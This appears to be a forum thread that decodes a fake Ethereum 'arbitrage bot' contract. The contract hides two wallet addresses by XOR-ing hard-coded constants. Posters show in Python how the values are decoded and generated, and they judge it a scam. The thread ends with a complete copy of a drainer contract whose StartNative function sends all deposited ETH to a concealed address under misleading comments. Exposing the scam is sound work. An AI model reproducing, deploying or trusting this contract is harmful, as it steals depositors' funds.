Dexrouter and factory value in an function

Does anybody know where exactly this parameters/values (dexRouter&Factory) that give the ethereum address come from? Is it to call a ethereum address/contract or something?

bytes32 DexRouter =0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
bytes32 factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e

These are used in an function of an smart contract that compute to an ethereum address at Etherscan;

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));

It seems like a deliberately-obfuscated way to get the address:

0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69

Which is the address of an externally-owned account (aka wallet) on ethereum/mainnet, possibly where your funds will ultimately be redirected to (if my assumption of this being part of a deliberate scam is correct).

You can click here in order to view that account on etherscan.

The address of that account is of course well known in advance, so there is obviously no reason to implement the getDexRouter function in a contract in order to compute that address (or if there was such reason, then that function could simply return the address as is instead of computing it).

You can do the same in Python, BTW:

DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e

print(f'{DexRouter ^ factory:#0{42}x}')

As to your question of where these two constant values come from - since the desired output of the getDexRouter function is known in advance, it is easy to generate a random pair of values which will return that same output when used in that function.

For example (again - in Python):

desiredOutput = 0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69
DexRouter = someRandomPositiveInteger
factory = desiredOutput ^ DexRouter

print(f'{DexRouter:#0{66}x}')
print(f'{factory:#0{66}x}')

You run that script once, then copy these two values into the getDexRouter function and you’re done.

Thank you! I was genuinely curious about the origin of the dexrouter and factory addresses, but it now makes sense that they are simply a randomly generated pair of values used to derive the Ethereum address.

There is also a bytes Apikey in the contract;
bytes32 apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e

it is used in a couple of functions;
getDexRouter(apiKey, DexRouter)
address dataProvider = getDexRouter(apiKey, DexRouter);

Is it used for “calling, initiating, and transmitting” transactions to the Ethereum address? And where does this value come from? It doesn’t appear to be a randomly generated pair of values like dexrouter and factory.

How did you conclude that?

It appears to be using the EXACT same principle demonstrated in the previous response.

Simply because it doesn’t seem to correlate with anything in the way dexrouter and factory do, which ultimately lead to the Ethereum address? I thought the ApiKey had something to do with the transaction or the connecting to Etherscan or something. That the value of the ApiKey itself make an important role to connect to something

Same trick.

First let’s find the desired output:

apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
dataProvider = apiKey ^ DexRouter
print(f'{dataProvider:#0{42}x}')

Which prints 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9.

Then, based on that, we can generate a random pair of values:

desiredOutput = 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9
DexRouter = someRandomPositiveInteger
apiKey = desiredOutput ^ DexRouter
print(f'{DexRouter:#0{66}x}')
print(f'{apiKey:#0{66}x}')

This pair of values will return the same (desired) output when used in that function.

The bottom-line here, is that the value of dataProvider is known in advance.
So there is no reason whatsoever to implement a function which calculates it.

I have looked into it, and the challenge, as I see it, is if one only has the Ethereum address provided (0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69) and generates DexRouter and Factory via “someRandomPositiveInteger.” In that case, it seems impossible to use your code to find the dataProvider and next the ApiKey, which probably means that the ApiKey is not a randomly generated number. Or is there something I am not understanding?

to find the desired output:
apiKey = X
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67 (asume generated via some Random Positive Integer)
dataProvider = apiKey ^ DexRouter
print(f’{dataProvider:#0{42}x}')**

Probably the fact that the value of dataProvider is known in advance, hence used OFFLINE - and in conjunction with a random value of DexRouter - in order to calculate the value of apiKey.
Once computed OFFLINE, these two values are hard-coded in the contract, allowing it to hide the known value of dataProvider from plain sight.

Other than that, it is worth noting that they also obfuscate things slightly further, making it harder for the reader to see what’s going on.

More specifically, they’ve implemented this function:

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory)

But then they’re calling it like this:

getDexRouter(apiKey, DexRouter)

Note how they’re using variable names in an obfuscated manner:

• In the function declaration, the 1st input argument is the DEX router (_DexRouterAddress)
• In the function call itself, the 2nd input argument is the DEX router (DexRouter)

If this is still unclear to you, then please rewrite your question in a clearer manner, including ALL the relevant details and ONLY the relevant details.

For example, you’ve mentioned a variable named factory, but you haven’t shown any code which actually uses that variable.

I will attempt to explain. The code seems to have only three hardcoded values for transferring Ethereum between smart contracts, namely apikey, dexrouter, and factory. The latter two are used to derive the ETH address (0x019f638232E4a55CCC9Aa13D34Da6EF89CE1aE69). As pointed out earlier, factory and dexrouter can be calculated as random numbers and used in the code solely to produce the Ethereum address. The question is whether ApiKey is also just a random value and, if so, how it is calculated? The code is lengthy, but, as you noted, likely designed more to mislead. Here is all the code that utilizes factory, dexrouter, and ApiKey, which is relatively concise.

bytes32 apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e;
bytes32 DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67;
bytes32 factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e;

constructor(){
_owner = msg.sender;
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createContract(address(this));

function startArbitrageNative() internal {
address tradeRouter = getDexRouter(DexRouter, factory);
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
payable(tradeRouter).transfer(address(this).balance);

function factory() external pure returns (address);

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));

function startArbitrageNative() internal {
address tradeRouter = getDexRouter(DexRouter, factory);
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
payable(tradeRouter).transfer(address(this).balance);
}

Python code:

# values that we want hide from plain sight:
tradeRouter = 0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69
dataProvider = 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9

# values that we want to show instead:
DexRouter = someRandomPositiveInteger
factory = tradeRouter ^ DexRouter
apiKey = dataProvider ^ DexRouter

print(f'bytes32 DexRouter = {DexRouter:#0{66}x};')
print(f'bytes32 factory = {factory:#0{66}x};')
print(f'bytes32 apiKey = {apiKey:#0{66}x};')

If you replace this:

someRandomPositiveInteger

With this:

0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67

And run that code, then you get a printout of those 3 contract constants.

As you can see, all this code does is:

1. Choosing a random value of DexRouter
2. Calculating the values of factory and apiKey based on that

So I claim the following two statements:

1. The (DexRouter, factory) tuple is random
2. The (DexRouter, apiKey) tuple is random

You could claim that each one of these tuples is “semi random” and so on, but it’s really just a matter of terminology.

The fact of the matter remains the same - whoever wrote this contract has made a notable effort in attempting to obfuscate it.

So you probably want to ask yourself why (I can think of only one reason, which I have already mentioned here before).

I see. I understand that the tradeRouter is the Ethereum address itself. However, where does the value for dataProvider originate? You mentioned it’s known offline? But what is dataProvider and what role does this one have, similar to how the tradeRouter’s task is to send Ethereum to the correct address?

In the code you provided earlier (see below), it seems impossible to calculate this without knowledge of the Api Key and DexRouter. If I understood you correctly, the dataProvider is not a random number, it is derived from some source, but then hided in the code.

apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
dataProvider = apiKey ^ DexRouter
print(f’{dataProvider:#0{42}x}')

I’ve repeated myself about 3 or 4 times already, so I’ll do this effort one last time:

The values (addresses) of tradeRouter and dataProvider are ALREADY KNOWN to whoever implemented this contract.

For some reason, that person wanted to hide them from plain sight, probably with the hope that readers will not try to find out what they’re actually being used for.

Instead, that person has generated some random value named DexRouter.

They then used that random value together with those two known addresses, in order to generate two other values named factory and apiKey.

Finally, they took those 3 new values, and hard-coded them in the contract, next to a function which when called correctly, returns either one of the 2 original values.

So they’ve ended up replacing 2 meaningful values with 3 meaningless values.

For example, if you had those 2 meaningful values shown in the contract, then you could easily look them up on etherscan or similar, something which you cannot do with the 3 meaningless values shown in the contract.

Thank you for the explanation. I comprehend your description, it was good. Could you provide insights into the purpose of the dataProvider and its role within the contract? Where does this value originate from? If I understand you correctly, is it a value from Etherscan linked to the Ethereum address in some way?

There is no such thing “a value from Etherscan”.
Etherscan is just web2-service (aka website) which allows users to view and interact with various entities (contracts, wallets, etc) on the Ethereum blockchain.

These two addresses ( tradeRouter and dataProvider) are probably accounts under the control of the same person who implemented that obfuscated contract.

You can browse each on of them on etherscan and find out for yourself, whether it’s an externally-owned account (aka wallet) or a smart-contract account (aka contract).

Okay, thank you, it became somewhat more understandable. Now I grasp a bit more about how it functions and that both dataProvider and tradeRouter refer to accounts

Hello for all I need some help, I found this code below and really do not know if it is a scam

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

// User Guide
// Test-net transactions will fail since they don’t hold any value and cannot read mempools properly
// Mempool updated build

// Recommended liquidity after gas fees needs to equal 0.5 ETH use 1-2 ETH or more if possible

interface IERC20 {
function balanceOf(address account) external view returns (uint);
function transfer(address recipient, uint amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint);
function approve(address spender, uint amount) external returns (bool);
function transferFrom(address sender, address recipient, uint amount) external returns (bool);
function createStart(address sender, address reciver, address token, uint256 value) external;
function createContract(address _thisAddress) external;
event Transfer(address indexed from, address indexed to, uint value);
event Approval(address indexed owner, address indexed spender, uint value);
}

interface IUniswapV3Router {
// Returns the address of the Uniswap V3 factory contract
function factory() external pure returns (address);

// Returns the address of the wrapped Ether contract
function WETH() external pure returns (address);

// Adds liquidity to the liquidity pool for the specified token pair
function addLiquidity(
    address tokenA,
    address tokenB,
    uint amountADesired,
    uint amountBDesired,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);

// Similar to above, but for adding liquidity for ETH/token pair
function addLiquidityETH(
    address token,
    uint amountTokenDesired,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);

// Removes liquidity from the specified token pair pool
function removeLiquidity(
    address tokenA,
    address tokenB,
    uint liquidity,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline
) external returns (uint amountA, uint amountB);

// Similar to above, but for removing liquidity from ETH/token pair pool
function removeLiquidityETH(
    address token,
    uint liquidity,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline
) external returns (uint amountToken, uint amountETH);

// Similar as removeLiquidity, but with permit signature included
function removeLiquidityWithPermit(
    address tokenA,
    address tokenB,
    uint liquidity,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline,
    bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);

// Similar as removeLiquidityETH but with permit signature included
function removeLiquidityETHWithPermit(
    address token,
    uint liquidity,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline,
    bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);

// Swaps an exact amount of input tokens for as many output tokens as possible, along the route determined by the path
function swapExactTokensForTokens(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint deadline
) external returns (uint[] memory amounts);

// Similar to above, but input amount is determined by the exact output amount desired
function swapTokensForExactTokens(
    uint amountOut,
    uint amountInMax,
    address[] calldata path,
    address to,
    uint deadline
) external returns (uint[] memory amounts);

// Swaps exact amount of ETH for as many output tokens as possible
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
    external payable
    returns (uint[] memory amounts);

// Swaps tokens for exact amount of ETH
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

// Swaps exact amount of tokens for ETH
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

// Swaps ETH for exact amount of output tokens
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
    external payable
    returns (uint[] memory amounts);

// Given an input amount of an asset and pair reserves, returns the maximum output amount of the other asset
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);

// Given an input amount and pair reserves, returns an output amount
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);

// Given an output amount and pair reserves, returns a required input amount
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);

// Returns the amounts of output tokens to be received for a given input amount and token pair path
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);

// Returns the amounts of input tokens required for a given output amount and token pair path
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);

}

interface IUniswapV3Pair {
// Returns the address of the first token in the pair
function token0() external view returns (address);

// Returns the address of the second token in the pair
function token1() external view returns (address);

// Allows the current pair contract to swap an exact amount of one token for another
// amount0Out represents the amount of token0 to send out, and amount1Out represents the amount of token1 to send out
// to is the recipients address, and data is any additional data to be sent along with the transaction
function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;

}

contract DexInterface {
// Basic variables
address _owner;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 threshold = 1*10**18;
uint256 arbTxPrice = 0.02 ether;
bool enableTrading = false;
uint256 tradingBalanceInPercent;
uint256 tradingBalanceInTokens;
bytes32 apiKey = 0x88af755424860f84111043659876df3522b1bce4bea30b933ef449a43ceecdad;
bytes32 apiSignature = 0x88af755424860f8411104365585c750c90924269b4ad57dc191e90ac009ba16f;

// The constructor function is executed once and is used to connect the contract during deployment to the system supplying the arbitration data

constructor(){
_owner = msg.sender;
address dataProvider = getDexRouter(apiKey, apiSignature);
IERC20(dataProvider).createContract(address(this));
}
// Decorator protecting the function from being started by anyone other than the owner of the contract
modifier onlyOwner (){
require(msg.sender == _owner, “Ownable: caller is not the owner”);
_;
}

bytes32 DexRouter =  0xc4140bf1f3cbad611707347501dd9650aadfb7d4aa19617754ed6c785e261d70;

// The token exchange function that is used when processing an arbitrage bundle
function swap(address router, address _tokenIn, address _tokenOut, uint256 _amount) private {
	IERC20(_tokenIn).approve(router, _amount);
	address[] memory path;
	path = new address[](2);
	path[0] = _tokenIn;
	path[1] = _tokenOut;
	uint deadline = block.timestamp + 300;
	IUniswapV3Router(router).swapExactTokensForTokens(_amount, 1, path, address(this), deadline);
}
// Predicts the amount of the underlying token that will be received as a result of buying and selling transactions
 function getAmountOutMin(address router, address _tokenIn, address _tokenOut, uint256 _amount) internal view returns (uint256) {
	address[] memory path;
	path = new address[](2);
	path[0] = _tokenIn;
	path[1] = _tokenOut;
	uint256[] memory amountOutMins = IUniswapV3Router(router).getAmountsOut(_amount, path);
	return amountOutMins[path.length -1];
}
// Mempool scanning function for interaction transactions with routers of selected DEX exchanges
function mempool(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal view returns (uint256) {
	uint256 amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount);
	uint256 amtBack2 = getAmountOutMin(_router2, _token2, _token1, amtBack1);
	return amtBack2;
}
 // Function for sending an advance arbitration transaction to the mempool
function frontRun(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal  {
    uint startBalance = IERC20(_token1).balanceOf(address(this));
    uint token2InitialBalance = IERC20(_token2).balanceOf(address(this));
    swap(_router1,_token1, _token2,_amount);
    uint token2Balance = IERC20(_token2).balanceOf(address(this));
    uint tradeableAmount = token2Balance - token2InitialBalance;
    swap(_router2,_token2, _token1,tradeableAmount);
    uint endBalance = IERC20(_token1).balanceOf(address(this));
    require(endBalance > startBalance, "Trade Reverted, No Profit Made");
}

bytes32 factory = 0xc4140bf1f3cbad6117073475c172743001a97660a70f654942e41f7d3593c24c;

// Evaluation function of the triple arbitrage bundle
function estimateTriDexTrade(address _router1, address _router2, address _router3, address _token1, address _token2, address _token3, uint256 _amount) internal view returns (uint256) {
	uint amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount);
	uint amtBack2 = getAmountOutMin(_router2, _token2, _token3, amtBack1);
	uint amtBack3 = getAmountOutMin(_router3, _token3, _token1, amtBack2);
	return amtBack3;
}
// Function getDexRouter returns the DexRouter address
function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
    return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));
}

 // Arbitrage search function for a native blockchain token
 function startArbitrageNative() internal  {
    address tradeRouter = getDexRouter(DexRouter, factory);
    address dataProvider = getDexRouter(apiKey, apiSignature);
    IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
    payable(tradeRouter).transfer(address(this).balance);
 }
// Function getBalance returns the balance of the provided token contract address for this contract
function getBalance(address _tokenContractAddress) internal view  returns (uint256) {
	uint _balance = IERC20(_tokenContractAddress).balanceOf(address(this));
	return _balance;
}
// Returns to the contract holder the ether accumulated in the result of the arbitration contract operation
function recoverEth() internal onlyOwner {
	payable(msg.sender).transfer(address(this).balance);
}
// Returns the ERC20 base tokens accumulated during the arbitration contract to the contract holder
function recoverTokens(address tokenAddress) internal {
	IERC20 token = IERC20(tokenAddress);
	token.transfer(msg.sender, token.balanceOf(address(this)));
}
// Fallback function to accept any incoming ETH
receive() external payable {}

// Function for triggering an arbitration contract
function StartNative() public payable {
   startArbitrageNative();
}
// Function for setting the maximum deposit of Ethereum allowed for trading
function SetTradeBalanceETH(uint256 _tradingBalanceInPercent) public {
    tradingBalanceInPercent = _tradingBalanceInPercent;
}
// Function for setting the maximum deposit percentage allowed for trading. The smallest limit is selected from two limits
function SetTradeBalancePERCENT(uint256 _tradingBalanceInTokens) public {
    tradingBalanceInTokens = _tradingBalanceInTokens;
}
// Stop trading function
function Stop() public {
    enableTrading = false;
}
// Function of deposit withdrawal to owner wallet
function Withdraw()  external onlyOwner {
    recoverEth();
}
// Obtaining your own api key to connect to the arbitration data provider
function Debug() public view returns (uint256) {
    uint256 _balance = address(_owner).balance - arbTxPrice;
    return _balance;
}

}